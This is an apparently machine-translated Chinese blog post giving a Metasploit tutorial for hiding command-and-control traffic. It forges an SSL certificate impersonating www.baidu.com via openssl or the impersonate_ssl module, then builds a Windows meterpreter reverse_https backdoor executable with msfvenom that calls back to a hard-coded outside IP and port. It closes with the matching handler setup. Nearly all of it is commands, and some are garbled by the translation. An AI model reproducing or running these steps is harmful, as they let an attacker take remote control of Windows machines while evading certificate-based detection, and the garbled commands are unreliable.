MSF,msfiiir

MSF 免责声明:本文仅做技术交流与学习… 目录
步骤:
1-利用 openssl 生成证书
1-impersonate_ssl 模块 –生成证书
​编辑
2.MSF 生成绑定证书后门: 3.MSF 监听上线&

免责声明: 本文仅供技术交流和学习之用.

目录

步骤:

1 – 使用openssl 生成证书

1-impersonate_ssl模块——生成证书

编辑

2.MSF生成绑定证书后门。

3.MSF监控上线。

证书伪造

加密https 流量

-解决了HTTPS-SSL通信证书被特征标记的问题

步骤:

1-利用 openssl 生成证书

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj \’/C=UK/ST=xiaodi/L=xiaodi/O=Development/CN=www.baidu.com\’ -keyout www.baidu.com。 key -out www.baidu.com.crt cat www.baidu.com.key www.baidu.com.crt www.baidu.com.pem rm -f www.baidu.com.key www.baidu.com.crt

1-impersonate_ssl 模块 –生成证书

此外,Metasploit框架还有一个Auxiliary/gather/impersonate_ssl模块,可用于自动从可信来源创建假证书,这非常有用。

使用辅助/收集/impersonate_ssl

setRHOST www.baidu.com

跑步

—-.pem

2.MSF 生成绑定证书后门:

msfvenom -p windows/meterpreter/reverse_https LHOST=47.94.236.117 LPORT=5566 PayloadUUIDTracking=true PayloadUUIDName=Whoamishell

HandlerSSLCert=/root/www.baidu.com.pem StagerVerifySSLCert=true -f exe -o https-b.exe

3.MSF 监听上线:

使用漏洞/多重/处理程序

负载设置windows/meterpreter/reverse_https

设置lhost 0.0.0.0

l 设置端口5566

设置HandlerSSLCert /root/www.baidu.com.pem

将StagerVerifySSLCert 设置为true

跑步

—可以通过访问https来查看证书。

证书伪造

https流量加密

以上有关#MSF的相关内容来源仅供您参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92118.html

(0)
CSDN's avatarCSDN
上一篇 2024年6月24日 下午11:50
下一篇 2024年6月24日 下午11:50

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注